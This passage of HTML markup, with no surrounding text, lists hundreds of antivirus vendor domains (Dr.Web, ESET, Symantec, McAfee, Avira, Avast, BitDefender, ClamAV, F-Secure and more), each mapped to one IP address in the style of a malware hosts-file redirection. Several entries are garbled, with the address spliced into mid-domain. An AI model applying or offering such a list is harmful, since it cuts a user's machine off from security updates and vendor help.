<span style="font-family: Arial; font-size: 10.0pt;">www.z-oleg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.drweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">freedrweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.freedrweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.drweb.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.drweb.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">av-desk.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.av-desk.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.drweb.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.drweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dr-web.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.dr-web.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.drweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">support.drweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">updates.sald.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sald.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.sald.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb.imshop.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">safeweb.norton.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.safeweb.norton.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.symantec.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">shop.symantecstore.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">liveupdate.symantec.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">liveupdate.symantecliveu=209.85.229.104pdate.com<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">service1.symantec.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.service1.symantec.co=209.85.229.104m<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">security.symantec.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">liveupdate.symantec.d4p.=209.85.229.104net<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">securityresponse.symante=209.85.229.104c.com<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sygate.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.sygate.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">esetnod32.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.esetnod32.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.eset.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.eset.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod32.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.eset.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.eset.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.eset.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.it=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod32.it=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.su=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod32.su=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod-32.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod-32.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">allnod.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.allnod.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">allnod.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.allnod.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virusall.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.virusall.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32eset.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod32eset.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.sk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.eset.sk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod32.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl1.antivir.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl2.antivir.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl3.antivir.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl4.antivir.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">free-av.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.free-av.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">free-av.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.free-av.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avira.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avira.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www1.avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dlpro.antivir.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forum.avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.forum.avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avira-antivir.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avira-antivir.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avirus.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avirus.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">home.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">us.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ru.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">de.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ca.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">fr.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">au.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">es.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">it.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">uk.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mx.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ru.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafee-online.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.mcafee-online.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafeesecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.mcafeesecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafeesecure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.mcafeesecure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avertlabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avertlabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.nai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">secure.nai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eu.shopmcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">shop.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">siblog.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafeestore.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.mcafeestore.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">service.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">siteadvisor.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.siteadvisor.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">scanalert.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.drsolomon.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafee-at-home.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wwww.mcafee-at-home.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">networkassociates.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.networkassociates.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avast.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avast.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">onlinescan.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download1.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download2.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download3.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download4.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download5.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download6.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download7.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">free.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">au.norton.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trustdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sshop.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pctools.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.grisoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">free.grisoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">msecn.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.bitdefender.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.bitdefender.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.bitdefender.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">myaccount.bitdefender.co,=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forum.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">upgrade.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">agnitum.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.agnitum.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">agnitum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.agnitum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">agnitum.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.agnitum.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">outpostfirewall.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.outpostfirewall.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl1.agnitum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl2.agnitum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forums.comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">comodogroup.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.comodogroup.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">personalfirewall.comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.personalfirewall.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">hackerguardian.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.hackerguardian.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nsclean.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nsclean.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">db.local.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamsupport.sourcefire.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lurker.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wiki.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">w32.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lists.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamwin.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.clamwin.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ru.clamwin.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gietl.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.gietl.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamav.dyndns.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">support.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">f-secure.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.f-secure.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">europe.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.europe.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">f-secure.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.f-secure.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">support.f-secure.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.f-secure.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">f-secure.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.f-secure.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">retail.sp.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">retail01.sp.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">retail02.sp.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.europe.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">norman.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.norman.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.norman.no=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sandbox.norman.no=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">norman.no=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.norman.no=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">niuone.norman.no=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pandasecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.pandasecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">viruslab.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
